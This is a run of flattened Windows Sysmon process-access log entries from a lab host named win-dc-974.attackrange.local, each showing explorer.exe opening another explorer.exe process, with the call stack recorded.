22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 